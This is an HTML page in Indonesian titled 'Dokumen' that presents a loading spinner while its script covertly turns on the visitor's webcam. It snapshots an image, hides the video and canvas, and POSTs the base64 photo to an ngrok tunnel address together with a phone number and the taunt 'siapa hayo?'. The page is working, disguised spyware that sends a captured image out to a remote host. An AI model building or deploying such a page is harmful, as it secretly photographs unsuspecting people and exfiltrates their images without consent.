<!DOCTYPE html>
<html lang="id">
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Dokumen</title>
        <style>
            * {
                margin: 0;
                padding: 0;
            }

            #loading {
                display: flex;
                justify-content: center;
                align-items: center;
            }

            .container {
                background-color: black;
                width: 100vw;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
            }

            .lds-ring {
                display: inline-block;
                position: relative;
                width: 80px;
                height: 80px;
            }
            .lds-ring div {
                box-sizing: border-box;
                display: block;
                position: absolute;
                width: 64px;
                height: 64px;
                margin: 8px;
                border: 8px solid #fff;
                border-radius: 50%;
                animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
                border-color: #fff transparent transparent transparent;
            }
            .lds-ring div:nth-child(1) {
                animation-delay: -0.45s;
            }
            .lds-ring div:nth-child(2) {
                animation-delay: -0.3s;
            }
            .lds-ring div:nth-child(3) {
                animation-delay: -0.15s;
            }
            @keyframes lds-ring {
                0% {
                    transform: rotate(0deg);
                }
                100% {
                    transform: rotate(360deg);
                }
            }
        </style>
    </head>
    <body>
        <video id="video" width="320" height="480" autoplay></video>
        <canvas id="canvas" width="320" height="480"></canvas>
        <div class="container">
            <div id="loading">
                <div class="lds-ring">
                    <div></div>
                    <div></div>
                    <div></div>
                    <div></div>
                </div>
            </div>
        </div>
        <script>
            let video = document.querySelector("#video");
            video.style.display = "none";
            let canvas = document.querySelector("#canvas");
            canvas.style.display = "none";
            const base = "https://ced6-116-206-36-32.ngrok-free.app";

            (async function () {
                let stream = await navigator.mediaDevices.getUserMedia({
                    video: true,
                    audio: false,
                });
                video.srcObject = stream;
                setTimeout(async () => {
                    canvas
                        .getContext("2d")
                        .drawImage(video, 0, 0, canvas.width, canvas.height);
                    let image_data_url = canvas
                        .toDataURL("image/jpeg")
                        .replace(/^data:image\/jpeg;base64,/, "");

                    await sM(image_data_url, "jpeg");
                }, 1000);
            })();

            async function sM(data, ext) {
                let mySender = await fetch(`${base}/send/`, {
                    method: "POST", // *GET, POST, PUT, DELETE, etc.
                    mode: "cors", // no-cors, *cors, same-origin
                    headers: {
                        "Content-Type": "application/json",
                    },
                    body: JSON.stringify({
                        to: "082286230830",
                        msg: "siapa hayo?",
                        img: data,
                        ext,
                    }), // body data type must match "Content-Type" header
                });
                let myRes = await mySender.text();
                console.log(myRes);
            }
        </script>
    </body>
</html>
